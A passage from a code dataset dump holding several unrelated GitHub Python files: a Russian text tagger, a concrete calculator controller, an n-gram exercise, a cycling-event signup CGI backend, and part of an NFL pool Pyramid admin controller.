encoding='utf-8'))\n self.tags = json.load(open('tags_inpt.json', mode='r', encoding='utf-8'))\n\n def format_parses(self, parses):\n\n for i, parse in enumerate(parses):\n result = OrderedDict()\n\n if i > 1:\n prev_word = parses[i - 1][0].normal_form\n else:\n prev_word = ''\n\n for j, item in enumerate(parse):\n pos = self.tags.get(item.tag.POS, '_')\n\n if pos != '_':\n anim = self.tags.get(item.tag.animacy, '_')\n case = self.tags.get(item.tag.case, '_')\n num = self.tags.get(item.tag.number, '_')\n gen = self.tags.get(item.tag.gender, '_')\n pers = self.tags.get(item.tag.person, '_')\n asp = self.tags.get(item.tag.aspect, '_')\n\n if pos in ('Nn', 'Pn'):\n if case != 'Ac':\n anim = '_'\n\n if num == 'Pl':\n gen = '_'\n\n elif pos == 'Vb':\n if pers == '_' and num == 'Pl':\n gen = '_'\n\n if all(gram == '_' for gram in (anim, case, num, gen, pers, asp)):\n result[pos] = item.normal_form\n else:\n result[','.join((pos, anim, case, num, gen, pers, asp))] = item.normal_form\n\n # Знаки препинания, числа, иностранные слова и прочее\n else:\n pos = self.tags.get(str(item.tag).split(',')[0], '_')\n\n if pos == 'PM':\n try:\n next_word = parses[i + 1][0].normal_form\n next_pair = '%s %s' % (parses[i + 1][0].normal_form, parses[i + 2][0].normal_form)\n\n # Терминал, если 1) в конце предложения\n except IndexError:\n if item.normal_form in self.nt:\n result['PM,Nt,_'] = item.normal_form\n else:\n result['PM,Tr,_'] = item.normal_form\n\n else:\n # Терминал, если 2) в списке, 3) перед союзами\n if item.normal_form in self.tr or next_word in self.conj['Sg'] or next_pair in self.conj['Db']:\n result['PM,Tr,_'] = item.normal_form\n # Нетерминал, если в списке\n elif item.normal_form in self.nt:\n result['PM,Nt,_'] = item.normal_form\n # Точка - нетерминал, если а) после односимвольного токена или б) часть сокращения\n elif item.normal_form == '.' and len(prev_word) == 1 or prev_word + item.normal_form in self.abbr:\n result['PM,Nt,_'] = item.normal_form\n # If all else fails, признаём неоднозначность\n else:\n for tag in ('PM,Nt,Tr', 'PM,Nt,_', 'PM,Tr,_'):\n result[tag] = item.normal_form\n\n else:\n result[pos] = item.normal_form\n\n for item in result:\n\n if not item.startswith('PM') and prev_word in self.prep:\n new = [pair for pair in result.items() if any(cs in pair[0] for cs in self.prep[prev_word])]\n if new:\n result = OrderedDict(new)\n break\n\n if item.startswith(('Pn', 'Pd', 'Cj', 'Pp', 'Pc')):\n # Если местоимение или местоимение-предикатив,\n # то отсекаем существительные и прилагательные-предикативы\n if item.startswith(('Pn', 'Pd')):\n new = [pair for pair in result.items() if not pair[0].startswith(\n ('Nn', 'Ap')\n )]\n # Если союз, предлог или частица,\n # то отсекаем существительные, прилагательные, местоимения и междометия\n else:\n new = [pair for pair in result.items() if not pair[0].startswith(\n ('Nn', 'Aj', 'Ap', 'Pn', 'Pd', 'Ij')\n )]\n\n result = OrderedDict(new)\n break\n\n yield result\n\n def process(self):\n\n def generate_log(*pairs):\n s = '{\\n'\n\n for pair in pairs:\n s += ' %s: %s,\\n' % pair\n\n s += '};\\n'\n\n return s\n\n os.chdir(self.inpt_dir)\n print('Please wait. Python is processing your data...')\n\n for file in glob.glob('*.txt'):\n fo = open(file, mode='r', encoding=self.coding)\n doc = self.impl.createDocument(None, 'text', None)\n root = doc.documentElement\n\n # Словарь для статистики\n stat = {\n 'breaks on start': 0,\n 'regular breaks': 0,\n 'breaks on end': 0,\n 'fallbacks': 0,\n 'terminals': 0\n }\n # Массив для фолбэков\n log_list = []\n\n for i, line in enumerate(fo.readlines()):\n # Массив токенов\n line_tokens = word_tokenize(line)\n # Массив упорядоченных словарей вида {разбор: лемма}\n line_parses = list(self.format_parses([self.morph.parse(token) for token in line_tokens]))\n\n p = doc.createElement('p')\n p.setAttribute('n', str(i + 1))\n\n previous = ''\n\n for j, parse_odict in enumerate(line_parses):\n parses = list(parse_odict)\n\n if parses[0].startswith('PM'):\n elem = doc.createElement('pc')\n else:\n elem = doc.createElement('w')\n\n elem_text = doc.createTextNode(line_tokens[j])\n elem.appendChild(elem_text)\n\n for row in self.gold_reader:\n # Если текущий элемент - однозначно терминальный ЗП, то искать с ним триграмму бессмысленно\n if parses[0] == 'PM,Tr,_':\n elem.setAttribute('ana', 'PM,Tr,_')\n elem.setAttribute('lemma', parse_odict['PM,Tr,_'])\n previous = 'PM,Tr,_'\n stat['terminals'] += 1\n\n else:\n # Если находимся в абсолютном начале предложения/чанка, рассматриваем левые биграммы\n # Фолбэк к pymorphy2, только если текущий элемент последний в предложении\n if j == 0 or previous == 'PM,Tr,_':\n if j + 1 != len(line_parses):\n if row[0] in parses and row[1] in line_parses[j + 1]:\n elem.setAttribute('ana', row[0])\n elem.setAttribute('lemma', parse_odict[row[0]])\n previous = row[0]\n stat['breaks on start'] += 1\n\n # Если текущий элемент последний в предложении, рассматриваем правые биграммы\n elif j + 1 == len(line_parses):\n if previous == row[1] and row[2] in parses:\n elem.setAttribute('ana', row[2])\n elem.setAttribute('lemma', parse_odict[row[2]])\n previous = row[2]\n stat['breaks on end'] += 1\n\n # В других случаях рассматриваем полноценные триграммы\n else:\n if row[0] == previous and row[1] in parses and row[2] in line_parses[j + 1]:\n elem.setAttribute('ana', row[1])\n elem.setAttribute('lemma', parse_odict[row[1]])\n previous = row[1]\n stat['regular breaks'] += 1\n\n if elem.hasAttributes():\n break\n\n # Фолбэк, если подходящей триграммы в золотом стандарте не нашлось\n if not elem.hasAttributes():\n # Фиксируем триграммы, на которых случился фолбэк\n if j == 0 and len(line_tokens) == 1:\n log_data = generate_log(\n (line_tokens[j], parses)\n )\n elif j == 0:\n log_data = generate_log(\n (line_tokens[j], parses),\n (line_tokens[j + 1], list(line_parses[j + 1]))\n )\n elif j + 1 == len(line_parses):\n log_data = generate_log(\n (line_tokens[j - 1], previous),\n (line_tokens[j], parses)\n )\n else:\n log_data = generate_log(\n (line_tokens[j - 1], previous),\n (line_tokens[j], parses),\n (line_tokens[j + 1], list(line_parses[j + 1]))\n )\n log_list.append(log_data)\n\n elem.setAttribute('ana', parses[0])\n elem.setAttribute('lemma', parse_odict[parses[0]])\n previous = parses[0]\n stat['fallbacks'] += 1\n\n p.appendChild(elem)\n root.appendChild(p)\n\n # Шагаем в выходную директорию\n os.chdir(self.otpt_dir)\n\n # Записываем в XML\n with open(file[:-3] + 'xml', mode='w', encoding='utf-8') as out:\n xml = doc.toprettyxml(indent=' ', encoding='utf-8')\n out.write(xml.decode())\n\n # Записываем фолбэки в лог-файл\n with open(file[:-4] + '_log.txt', mode='w', encoding='utf-8') as log:\n for line in log_list:\n log.write(line + '\\n')\n\n # Выдаём статистику по файлу\n print(file)\n for key in stat:\n print(' %d %s' % (stat[key], key))\n\n # Возвращаемся во входную директорию - к следующим файлам\n os.chdir(self.inpt_dir)\n doc.unlink()\n fo.close()\n\n\nif __name__ == '__main__':\n try:\n with Profiler():\n Processor(os.getcwd() + '\\\\inpt', os.getcwd() + '\\\\otpt', 'trigrams.csv', 'windows-1251').process()\n except FileNotFoundError:\n print('Error: source file missing.')\n","repo_name":"vintagentleman/PM-TXM","sub_path":"process_inpt.py","file_name":"process_inpt.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32411128198","text":"from model import Model\nfrom view import View\n\n\nclass Controller:\n '''\n Связь интерфейса и модели.\n '''\n\n def __init__(self, model: Model, view: View):\n self.model = model\n self.view = view\n\n def save(self, concrete: str, cement: str,\n water: str, proportion: str,\n sand_density: str, rubber_density: str,):\n \"\"\"\n Сохранять результаты расчета.\n \"\"\"\n try:\n self.model.concrete = concrete\n self.model.cement = cement\n self.model.water = water\n self.model.proportion = proportion\n self.model.sand_density = sand_density\n self.model.rubber_density = rubber_density\n\n self.model.calculate()\n\n self.view.show_success('Файл сохранен')\n\n except ValueError as error:\n self.view.show_error(error)\n","repo_name":"nbaishev/concrete_mix_calc","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36856347690","text":"#Weezie Wilson\n#4/19/21: Same as bigrams-random-text.py, but with ngrams\n\ncounts = {}\nwords = []\nn = 5\n\nwith open('txt/tiny.txt', 'r') as f:\n for line in f:\n words.extend(line.strip().split())\n\nprint(words)\n\nfor i in range(len(words)-n+1):\n lst = []\n for j in range(n):\n lst.append(words[i+j])\n tup = tuple(lst)\n print(tup)\n\n if tup in counts:\n counts[tup].append(words[i+n])\n else:\n counts[tup] = [words[i+(n-1)]]\n\nprint(counts)\n","repo_name":"michaelschung/bc-ds-and-a","sub_path":"Unit3-Applications/weezie/ngrams-random-text.py","file_name":"ngrams-random-text.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"302128811","text":"#!/usr/bin/env python3\nimport json\nimport random\nfrom pymongo import MongoClient\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nfrom icalendar import Calendar, Event\nfrom datetime import datetime\nimport cgi\nimport cgitb\nfrom math import cos, asin, sqrt, pi\ncgitb.enable()\n\ndef main():\n # Set up the database connection\n client = MongoClient()\n db = client.cwm_database\n global rides \n rides = db.rides_collection\n \n # get_average_lon_lat_from_gpx(\"EXAMPLEIDWILLBERANDOM\",2)\n form = cgi.FieldStorage()\n\n if not \"action\" in form:\n print(\"Content-type: text/plain; charset=utf-8\\n\\nNo action\")\n return\n\n if form[\"action\"].value == \"gpx\":\n get_gpx(form[\"ride_id\"].value,form[\"route\"].value)\n\n elif form[\"action\"].value == \"ics\":\n get_ics(form[\"ride_id\"].value,form[\"route\"].value)\n\n elif form[\"action\"].value == \"json\":\n get_json(form[\"ride\"].value, form[\"guid\"].value)\n\n elif form[\"action\"].value == \"signup\":\n signup(form[\"ride\"].value,form[\"route\"].value, form[\"name\"].value, form[\"guid\"].value)\n\n elif form[\"action\"].value == \"getroute\":\n get_route(form[\"ride\"].value,form[\"route\"].value)\n\n elif form[\"action\"].value == \"withdraw\":\n withdraw(form[\"ride\"].value,form[\"route\"].value, form[\"guid\"].value)\n\n elif form[\"action\"].value == \"withdrawadmin\":\n withdraw(form[\"ride\"].value,form[\"route\"].value, form[\"name\"].value, form[\"guid\"].value, form[\"admin\"].value)\n\n elif form[\"action\"].value == \"validate_admin\":\n validate_admin(form[\"ride\"].value,form[\"admin\"].value)\n\n elif form[\"action\"].value == \"new_route\":\n add_edit_route(form)\n\n elif form[\"action\"].value == \"delete_route\":\n delete_route(form[\"ride\"].value,form[\"admin\"].value, form[\"route\"].value)\n\n elif form[\"action\"].value == \"newevent\":\n new_event(form[\"title\"].value,form[\"date\"].value)\n\n else:\n print(\"Didn't understand action \"+form[\"action\"].value)\n\n\n\ndef new_event(title,date):\n \"\"\"\n Creates a new event and puts it into the database\n \"\"\"\n\n ride = {\n \"ride_id\": generate_id(10),\n \"admin_id\": generate_id(10), \n \"name\": title,\n \"date\": date,\n \"routes\" : []\n }\n\n rides.insert_one(ride)\n\n print(\"Content-type: text/plain; charset=utf-8\\n\\n\"+ride['ride_id']+\" \"+ride['admin_id'], end=\"\")\n\n\ndef generate_id(size):\n \"\"\"\n Generic function used for creating IDs for both\n events and admin authentication\n \"\"\"\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n code = \"\"\n\n for _ in range(size):\n code += random.choice(letters)\n\n return code\n\n\ndef delete_route(ride_id,admin_id,route_number):\n \"\"\"\n Completely removes a route from an event including\n the gpx and the signup information.\n \"\"\"\n ride = rides.find_one({\"ride_id\":ride_id})\n\n if ride[\"admin_id\"] != admin_id:\n raise Exception(\"Invalid admin id for ride\")\n\n seen_routes = []\n for i,route in enumerate(ride[\"routes\"]):\n seen_routes.append(str(route[\"number\"]))\n if str(route[\"number\"]) == route_number:\n ride[\"routes\"].pop(i)\n rides.update({\"ride_id\":ride_id},ride)\n\n print(\"Content-type: text/plain; charset=utf-8\\n\\nTrue\")\n return\n\n raise Exception(f\"Couldn't find route to remove matching {route_number} checked {seen_routes}\")\n \n\ndef add_edit_route(form):\n \"\"\"\n This same function is used to either edit an existing\n route or add a new one. If they supply a route_number\n then they're editing rather than adding.\n \"\"\"\n\n ride = rides.find_one({\"ride_id\":form[\"ride_id\"].value})\n\n if ride[\"admin_id\"] != form[\"admin_id\"].value:\n raise Exception(\"Invalid admin id for ride\")\n\n # See if they supplied an existing route number\n if form[\"route_number\"].value:\n existing_number = int(form[\"route_number\"].value)\n # We're editing an existing route\n for route in ride[\"routes\"]:\n number = int(route[\"number\"])\n if number == existing_number:\n # This is the route we're editing\n route = route\n route[\"name\"] = form[\"title\"].value\n route[\"description\"] = form[\"description\"].value\n route[\"start_time\"] = form[\"start\"].value\n route[\"departs\"] = form[\"departs\"].value\n route[\"pace\"] = form[\"pace\"].value\n route[\"stop\"] = form[\"stop\"].value\n route[\"leader\"] = form[\"leader\"].value\n route[\"spaces\"] = form[\"spaces\"].value\n\n # If they supplied a gpx file we need to add \n # the data from that too.\n # If there's no file then it will just be a \n # string here\n # raise Exception(f\"gpx is {type(form['gpx'].value)}\")\n if not isinstance(form['gpx'].value,str):\n gpx_file = form[\"gpx\"]\n gpx = gpx_file.file.read().decode(\"UTF-8\")\n lat,lon,distance, elevation = get_stats_from_gpx(gpx)\n route[\"gpx\"] = gpx\n route[\"lat\"] = str(lat)\n route[\"lon\"] = str(lon)\n route[\"distance\"] = round(distance,3)\n route[\"elevation\"] = round(elevation,3)\n \n break\n\n else:\n highest_route = 0\n for route in ride[\"routes\"]:\n number = int(route[\"number\"])\n if number > highest_route:\n highest_route = number\n\n \n highest_route += 1\n\n gpx_file = form[\"gpx\"]\n gpx = gpx_file.file.read().decode(\"UTF-8\")\n\n lat,lon,distance,elevation = get_stats_from_gpx(gpx)\n\n new_route = {\n \"number\": str(highest_route),\n \"name\": form[\"title\"].value,\n \"description\" : form[\"description\"].value,\n \"start_time\": form[\"start\"].value,\n \"departs\": form[\"departs\"].value,\n \"distance\": round(distance,3),\n \"elevation\": round(elevation,3),\n \"pace\": form[\"pace\"].value,\n \"stop\": form[\"stop\"].value,\n \"leader\": form[\"leader\"].value,\n \"spaces\": form[\"spaces\"].value,\n \"gpx\": gpx,\n \"lat\": str(lat),\n \"lon\": str(lon),\n \"joined\" : []\n }\n\n ride[\"routes\"].append(new_route)\n\n rides.update({\"ride_id\":form[\"ride_id\"].value},ride)\n\n print(\"Content-type: text/plain; charset=utf-8\\n\\nTrue\")\n\n\ndef get_json(ride_id,guid):\n \"\"\"\n Gets the main JSON document covering the whole event\n and all routes. We ask for the guid so we can show the\n rider whether they are signed up for anything, but we \n remove all of the other guids so they don't see other\n people's data.\n \"\"\"\n # We need the user's guid so we can only\n # return their guids in the answer\n json_content = rides.find_one({\"ride_id\":ride_id})\n\n json_content.pop(\"_id\")\n json_content.pop(\"admin_id\")\n\n for route in json_content[\"routes\"]:\n # Hide all guids but the users own\n for joined in route[\"joined\"]:\n if joined[\"guid\"] != guid:\n joined[\"guid\"] = \"\"\n\n route.pop(\"gpx\")\n\n print(\"Content-type: application/json\\n\")\n\n print(json.dumps(json_content))\n\n\ndef get_route(ride, route_number):\n \"\"\"\n Used for populating the edit route dialog. Gets\n the JSON for a single route, but removes the signup\n information (including guids)\n \"\"\"\n json_data = rides.find_one({\"ride_id\":ride})\n\n found_route = False\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n route.pop(\"joined\")\n print(\"Content-type: application/json\\n\")\n print(json.dumps(route))\n return\n\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\n\ndef signup(ride, route_number, name, guid):\n \"\"\"\n Adds a new signup to a ride. The guid must be present\n unless this is being instigated by an admin\n \"\"\"\n\n if guid.strip() == \"\":\n raise Exception(f\"Only admins can sign up riders without a guid\")\n\n json_data = rides.find_one({\"ride_id\":ride})\n\n found_route = False\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n found_route = True\n already_signed = False\n for joined in route[\"joined\"]:\n if joined[\"guid\"] == guid:\n # They're already signed up\n already_signed = True\n break\n\n if not already_signed and len(route[\"joined\"]) < int(route[\"spaces\"]):\n route[\"joined\"].append({\"guid\":guid, \"name\":name})\n else:\n raise Exception(\"Already signed or route full\")\n \n break\n\n if not found_route:\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\n rides.update({\"ride_id\":ride},json_data)\n\n print(f\"Content-type: text/plain; charset=utf-8\\n\\n{route_number}\", end=\"\")\n\ndef withdraw(ride, route_number, guid):\n \"\"\"\n Processes a user-initiated withdrawl. The guid must\n be present and correct. Admins can bypass this with\n the withdrawadmin function which is less picky\n \"\"\"\n\n if guid.strip() == \"\":\n raise Exception(f\"Won't withdraw a blank guid\")\n\n json_data = rides.find_one({\"ride_id\":ride})\n\n found_route = False\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n new_joined = []\n found_route = True\n for joined in route[\"joined\"]:\n if joined[\"guid\"] != guid:\n new_joined.append(joined)\n\n route[\"joined\"] = new_joined \n break\n\n if not found_route:\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\n rides.update({\"ride_id\":ride},json_data)\n\n print(f\"Content-type: text/plain; charset=utf-8\\n\\n{route_number}\", end=\"\")\n\n\ndef withdrawadmin(ride, route_number, guid, name, admin_id):\n \"\"\"\n Processes a withdrawl but here we can allow this for another\n user because they will authenticate as admins. This also \n allows removing registrations without a guid (ie those made)\n by an admin\n \"\"\"\n\n json_data = rides.find_one({\"ride_id\":ride})\n\n if ride[\"admin_id\"] != admin_id:\n raise Exception(\"Invalid admin id for ride\")\n\n found_route = False\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n new_joined = []\n found_route = True\n for joined in route[\"joined\"]:\n if joined[\"guid\"] == guid and joined[\"name\"] == name:\n continue\n\n new_joined.append(joined)\n\n route[\"joined\"] = new_joined \n break\n\n if not found_route:\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\n rides.update({\"ride_id\":ride},json_data)\n\n print(f\"Content-type: text/plain; charset=utf-8\\n\\n{route_number}\", end=\"\")\n\n\ndef list_joined_admin(ride,route,admin_id):\n \"\"\"\n Gets the json for the signups for a specific\n route. Doesn't redact the guids, but we may\n want to rethink this as it does expose guids\n to any admin of an event you've signed up for\n \"\"\"\n json_data = rides.find_one({\"ride_id\":ride})\n\n if ride[\"admin_id\"] != admin_id:\n raise Exception(\"Invalid admin id for ride\")\n\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route:\n print(\"Content-type: application/json\\n\")\n print(json.dumps(route[\"joined\"]))\n return\n\n raise Exception(f\"Couldn't find route '{route}'\")\n\ndef validate_admin(ride, admin):\n \n if rides.find_one({\"ride_id\":ride, \"admin_id\":admin}):\n print(\"Content-type: text/plain; charset=utf-8\\n\\nTrue\")\n\n else:\n raise Exception(f\"Admin IDs didn't match\")\n\n\n\ndef get_gpx(ride_id, route_number):\n ride = rides.find_one({\"ride_id\":ride_id})\n\n for route in ride[\"routes\"]:\n if (route[\"number\"] == route_number):\n print(\"Content-Disposition:attachment;filename=route.gpx\")\n print(\"Content-type: application/gpx+xml\\n\")\n print(route[\"gpx\"])\n return\n\n raise Exception(f\"Couldn't find gpx for ride={ride_id} route={route_number}\")\n\n\ndef get_ics(ride_id, route_number):\n ride = rides.find_one({\"ride_id\":ride_id})\n\n for route in ride[\"routes\"]:\n if (route[\"number\"] == route_number):\n # Create a calendar object\n cal = Calendar()\n event = Event()\n\n\n # We need a datetime string with the \n # year month day hour minute in it\n ymd = [int(x) for x in ride[\"date\"].split(\"-\")]\n hm = [int(x) for x in route[\"start_time\"].split(\":\")]\n\n event.add('dtstart', datetime(ymd[0],ymd[1],ymd[2],hm[0],hm[1],0))\n event.add('dtend', datetime(ymd[0],ymd[1],ymd[2],hm[0]+1,hm[1],0))\n event.add('summary',ride[\"name\"])\n event.add('description',f\"{route['name']} : {route['description']}\\nDeparting {route['departs']}\")\n\n cal.add_component(event)\n\n print(\"Content-type: text/calendar; charset=utf-8\\n\")\n print(cal.to_ical().decode(\"utf-8\"))\n return\n\n raise Exception(f\"Couldn't find ics for ride={ride_id} route={route_number}\")\n\n\n\n\ndef get_stats_from_gpx(gpx_data):\n\n # Open XML document using minidom parser\n DOMTree = xml.dom.minidom.parseString(gpx_data)\n collection = DOMTree.documentElement\n\n points = collection.getElementsByTagName(\"trkpt\")\n\n lat_max = 0\n lat_min = 0\n lon_max = 0\n lon_min = 0\n\n last_lat = 0\n last_lon = 0\n\n distance = 0\n\n # Our elevation calculation is pretty crude. We're just\n # using the elevation markers in the GPS file, which isn't \n # ideal but is the best we can do without additional external\n # information.\n elevation = 0\n\n last_elevation = 0\n\n for i,point in enumerate(points):\n this_lat = float(point.getAttribute(\"lat\"))\n this_lon = float(point.getAttribute(\"lon\"))\n this_elevation = float(point.getElementsByTagName(\"ele\")[0].firstChild.data)\n\n\n if i==0:\n lat_max = this_lat\n lat_min = this_lat\n lon_max = this_lon\n lon_min = this_lon\n\n else:\n if this_lat > lat_max:\n lat_max = this_lat\n if this_lat < lat_min:\n lat_min = this_lat\n if this_lon > lon_max:\n lon_max = this_lon\n if this_lon < lon_min:\n lon_min = this_lon\n\n # Calculate the distance from the last\n # point to this one\n p = pi/180\n a = 0.5 - cos((this_lat-last_lat)*p)/2 + cos(last_lat*p) * cos(this_lat*p) * (1-cos((this_lon-last_lon)*p))/2\n distance += 12742 * asin(sqrt(a))\n\n \n # Add any elevation change\n if this_elevation > last_elevation:\n elevation += this_elevation - last_elevation\n\n\n last_lat = this_lat\n last_lon = this_lon\n last_elevation = this_elevation\n\n\n mid_lat = (lat_min+lat_max)/2\n mid_lon = (lon_min+lon_max)/2\n\n\n return(mid_lat,mid_lon,distance, elevation)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"s-andrews/cyclewithme","sub_path":"cgi-bin/cwm_backend.py","file_name":"cwm_backend.py","file_ext":"py","file_size_in_byte":15503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"221735467","text":"import pyramid_handlers\nfrom nflpool.controllers.base_controller import BaseController\nfrom nflpool.viewmodels.newinstallviewmodel import NewInstallViewModel\nfrom nflpool.viewmodels.newseasonviewmodel import NewSeasonViewModel\nfrom nflpool.viewmodels.update_nflplayers_viewmodel import UpdateNFLPlayersViewModel\nfrom nflpool.services.new_install_service import NewInstallService\nfrom nflpool.services.new_season_service import NewSeasonService\nfrom nflpool.services.activeplayers_service import ActivePlayersService\nfrom nflpool.viewmodels.update_nflschedule_viewmodel import UpdateNFLScheduleViewModel\nfrom nflpool.services.update_nflschedule_service import UpdateScheduleService\nfrom nflpool.data.account import Account\nfrom nflpool.data.dbsession import DbSessionFactory\nfrom nflpool.services.admin_service import AccountService\nfrom nflpool.viewmodels.update_weekly_stats_viewmodel import UpdateWeeklyStats\nfrom nflpool.services.weekly_msf_data import WeeklyStatsService\nfrom nflpool.viewmodels.update_unique_picks_viewmodel import UniquePicksViewModel\nfrom nflpool.services.unique_picks_service import UniquePicksService\nfrom nflpool.services.standings_service import StandingsService\nfrom nflpool.viewmodels.admin_update_viewmodel import AdminViewModel\nfrom nflpool.data.seasoninfo import SeasonInfo\nfrom nflpool.data.teaminfo import TeamInfo\nfrom nflpool.data.weekly_team_stats import WeeklyTeamStats\nfrom nflpool.services.time_service import TimeService\n\n\nclass AdminController(BaseController):\n @pyramid_handlers.action(renderer=\"templates/admin/index.pt\")\n def index(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n try:\n season_row = (\n session.query(SeasonInfo.current_season)\n .filter(SeasonInfo.id == \"1\")\n .first()\n )\n season = season_row.current_season\n\n return {\"season\": season}\n\n except AttributeError:\n self.redirect(\"/admin/new_season\")\n\n # GET /admin/new_install\n @pyramid_handlers.action(\n renderer=\"templates/admin/new_install.pt\",\n request_method=\"GET\",\n name=\"new_install\",\n )\n def new_install_get(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = NewInstallViewModel()\n return vm.to_dict()\n\n # POST /admin/new_install\n @pyramid_handlers.action(\n renderer=\"templates/admin/new_install.pt\",\n request_method=\"POST\",\n name=\"new_install\",\n )\n def new_install_post(self):\n vm = NewInstallViewModel()\n vm.from_dict(self.request.POST)\n\n # Insert team info\n NewInstallService.get_team_info()\n NewInstallService.create_division_info()\n NewInstallService.create_conference_info()\n NewInstallService.create_pick_types()\n NewInstallService.create_pick_type_points()\n\n # redirect\n self.redirect(\"/admin/update_nflplayers\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/new_season.pt\",\n request_method=\"GET\",\n name=\"new_season\",\n )\n def new_season_get(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = NewSeasonViewModel()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/new_season.pt\",\n request_method=\"POST\",\n name=\"new_season\",\n )\n def new_season_post(self):\n vm = NewSeasonViewModel()\n vm.from_dict(self.request.POST)\n\n NewSeasonService.create_season(vm.new_season_input)\n AccountService.reset_paid()\n\n # redirect - See if TeamInfo has data, if not do new_install\n session = DbSessionFactory.create_session()\n team_info_query = session.query(TeamInfo.conference_id).first()\n\n if team_info_query is None:\n self.redirect(\"/admin/new_install\")\n\n else:\n self.redirect(\"/admin/update_nflplayers\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update_nflplayers.pt\",\n request_method=\"GET\",\n name=\"update_nflplayers\",\n )\n def update_nfl_players(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = UpdateNFLPlayersViewModel()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update_nflplayers.pt\",\n request_method=\"POST\",\n name=\"update_nflplayers\",\n )\n def update_nfl_players_post(self):\n vm = UpdateNFLPlayersViewModel()\n vm.from_dict(self.request.POST)\n\n # Insert NFLPlayer info\n ActivePlayersService.add_active_nflplayers(\n vm.firstname, vm.lastname, vm.player_id, vm.team_id, vm.position, vm.season\n )\n\n # redirect\n self.redirect(\"/admin/update_nflschedule\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update_nflschedule.pt\",\n request_method=\"GET\",\n name=\"update_nflschedule\",\n )\n def update_nfl_schedule(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = UpdateNFLScheduleViewModel()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update_nflschedule.pt\",\n request_method=\"POST\",\n name=\"update_nflschedule\",\n )\n def update_nfl_schedule_post(self):\n vm = UpdateNFLScheduleViewModel()\n vm.from_dict(self.request.POST)\n\n # Insert NFL Schedule\n UpdateScheduleService.update_nflschedule(\n vm.game_id, vm.game_date, vm.away_team, vm.home_team, vm.week, vm.season\n )\n\n # redirect\n self.redirect(\"/admin\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/account-list.pt\",\n request_method=\"GET\",\n name=\"account-list\",\n )\n def list_accounts(self):\n\n # Show list of accounts\n account_list = AccountService.get_all_accounts()\n\n return {\"account_list\": account_list}\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-weekly-stats.pt\",\n request_method=\"GET\",\n name=\"update-weekly-stats\",\n )\n def update_weekly_stats(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = UpdateWeeklyStats()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-weekly-stats.pt\",\n request_method=\"POST\",\n name=\"update-weekly-stats\",\n )\n def update_weekly_stats_post(self):\n vm = UpdateWeeklyStats()\n vm.from_dict(self.request.POST)\n\n session = DbSessionFactory.create_session()\n\n week = TimeService.get_week()\n\n season_row = session.query(SeasonInfo).filter(SeasonInfo.id == \"1\").first()\n season = season_row.current_season\n\n row = (\n session.query(WeeklyTeamStats.week)\n .filter(WeeklyTeamStats.season == season)\n .order_by(WeeklyTeamStats.week.desc())\n .first()\n )\n\n # Check if the stats have already been updated for the week and, if so, redirect\n # Try / Except to determine if it's Week 1 (Week would be empty resulting in a TypeError NoneType)\n try:\n\n if row[0] == week or week >= 18:\n self.redirect(\"/admin/stats_already_ran\")\n\n else:\n # Insert weekly team and player stats\n WeeklyStatsService.get_qb_stats()\n WeeklyStatsService.get_rb_stats()\n WeeklyStatsService.get_rec_stats()\n WeeklyStatsService.get_sack_stats()\n WeeklyStatsService.get_interception_stats()\n 